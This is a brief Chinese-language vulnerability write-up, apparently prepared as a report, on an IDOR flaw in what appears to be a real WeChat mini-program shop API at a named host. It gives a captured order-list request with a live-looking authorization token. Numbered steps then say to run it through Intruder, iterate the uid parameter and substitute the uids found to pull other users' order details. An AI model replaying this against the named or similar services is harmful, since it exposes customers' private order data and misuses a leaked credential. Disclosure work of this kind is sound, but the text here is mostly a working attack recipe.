ga通报
/api/front/order/list?type=4&page=1&limit=20&uid=9123
GET /api/front/order/list?type=4&page=1&limit=20&uid=1422 HTTP/1.1
Host: api1.mallmp.jhykyy.cn
Connection: keep-alive
charset: utf-8
User-Agent: Mozilla/5.0 (Linux; Android 12; SM-S9080 Build/V417IR; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Mobile Safari/537.36 MMWEBID/4781 MicroMessenger/8.0.48.2580(0x2800303F) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android
content-type: application/json
Accept-Encoding: gzip, deflate, br
authori-zation: 1eef400f88414a05890a83cbadcf03f6
Referer: https://servicewechat.com/wxf9424287a3ae96af/33/page-frame.html
(5)把数据包发到intruder,遍历uid
(6)把uid值改为获取的值,打开抓包,点击查询详细